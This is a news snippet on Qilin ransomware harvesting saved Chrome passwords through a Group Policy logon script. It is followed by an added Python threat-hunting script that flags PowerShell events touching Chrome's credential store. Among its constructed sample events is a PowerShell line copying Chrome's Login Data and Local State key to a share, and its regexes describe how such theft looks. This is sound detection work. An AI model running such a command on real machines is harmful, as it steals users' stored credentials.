Qilin ransomware steals login credentials from Chrome
During an investigation into a Qilin ransomware attack, the Sophos X-Ops team found that the attackers had harvested credentials saved in Google Chrome browsers on a subset of network endpoints. The Qilin group, active for more than two years, gained initial access through compromised credentials and then modified Group Policy so that a PowerShell script collecting Chrome credentials ran as a logon script; the script executed each time a user logged in and gathered the saved data.

Attackers collect credentials using PowerShell script

The cybercriminals used the PowerShell script to collect credentials from networked endpoints and were able to avoid the lack of…
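The technique described above leaves a recognisable trace when PowerShell script block logging (Microsoft-Windows-PowerShell/Operational, Event ID 4104) is enabled: a logon script served from the domain SYSVOL share that reads Chrome's saved-login store. The following is an added hunting example, not code from Sophos or from the Qilin attackers; the sample events are constructed, and the field names, regexes and share paths are assumptions chosen to mirror the shape of a 4104 record. Chrome stores saved logins in the SQLite file "Login Data" under the profile directory and the DPAPI-wrapped encryption key in "Local State", so those two filenames are the anchor of the detection.

```python
"""Hunt exported PowerShell 4104 script-block events for GPO logon scripts
that touch Chrome's saved-credential store (added example, constructed data)."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Chrome keeps saved logins in "Login Data" and the DPAPI-wrapped key in
# "Local State", both under ...\Google\Chrome\User Data\<profile>\.
CHROME_STORE = re.compile(r"Google\\Chrome\\User Data\\.*?(Login Data|Local State)", re.I)
# Typical ways a script reads the store or unwraps the key (assumed list).
STORE_ACCESS = re.compile(
    r"Copy-Item|Get-Content|\[System\.IO\.File\]|sqlite|"
    r"\[System\.Security\.Cryptography\.ProtectedData\]", re.I)
# Group Policy logon scripts are served from the domain SYSVOL share.
GPO_SCRIPT = re.compile(r"^\\\\[^\\]+\\SYSVOL\\", re.I)


@dataclass
class Finding:
    record_id: int
    user: str
    reasons: list = field(default_factory=list)


def score_event(event: dict) -> Optional[Finding]:
    """Return a Finding when a 4104 event names Chrome's credential store,
    with extra reasons if it reads the store or came from a GPO path."""
    text = event["ScriptBlockText"]
    reasons = []
    if CHROME_STORE.search(text):
        reasons.append("references Chrome Login Data / Local State")
    if not reasons:
        return None
    if STORE_ACCESS.search(text):
        reasons.append("reads or decrypts the store")
    if GPO_SCRIPT.match(event.get("Path", "")):
        reasons.append("script served from SYSVOL (GPO logon script)")
    return Finding(event["RecordId"], event["User"], reasons)


def hunt(events: list) -> list:
    """Keep only events that both name the store and read or decrypt it;
    the SYSVOL reason is context that tells you GPO was the delivery path."""
    out = []
    for e in events:
        f = score_event(e)
        if f and any(r.startswith("reads") for r in f.reasons):
            out.append(f)
    return out


# Constructed sample events; field names follow the 4104 record layout.
SAMPLE_EVENTS = [
    {  # benign GPO logon script that maps a home drive
        "RecordId": 1, "User": "CORP\\alice",
        "Path": "\\\\corp.example\\SYSVOL\\corp.example\\scripts\\logon.ps1",
        "ScriptBlockText": "New-PSDrive -Name H -PSProvider FileSystem "
                           "-Root \\\\fs01\\home\\alice -Persist",
    },
    {  # constructed malicious logon script: copies the Chrome DB and key to a share
        "RecordId": 2, "User": "CORP\\alice",
        "Path": "\\\\corp.example\\SYSVOL\\corp.example\\Policies\\{<gpo-guid>}"
                "\\User\\Scripts\\Logon\\update.ps1",
        "ScriptBlockText": (
            "$p = \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data\"; "
            "Copy-Item $p \\\\fs01\\share\\$env:USERNAME.db; "
            "Copy-Item \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Local State\" "
            "\\\\fs01\\share\\$env:USERNAME.ls"
        ),
    },
    {  # benign helpdesk script: clears the cache, never touches the credential store
        "RecordId": 3, "User": "CORP\\bob",
        "Path": "C:\\Tools\\clear-cache.ps1",
        "ScriptBlockText": "Remove-Item \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data"
                           "\\Default\\Cache\\*\" -Recurse",
    },
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"record {f.record_id} ({f.user}): " + "; ".join(f.reasons))
```

Only the second event is reported: it names both "Login Data" and "Local State", copies them off the host, and was delivered from a Policies path under SYSVOL. The cache-clearing script also lives under the Chrome profile but never names the credential store, so it is ignored, which is the distinction a practitioner needs to keep this rule from firing on routine browser maintenance.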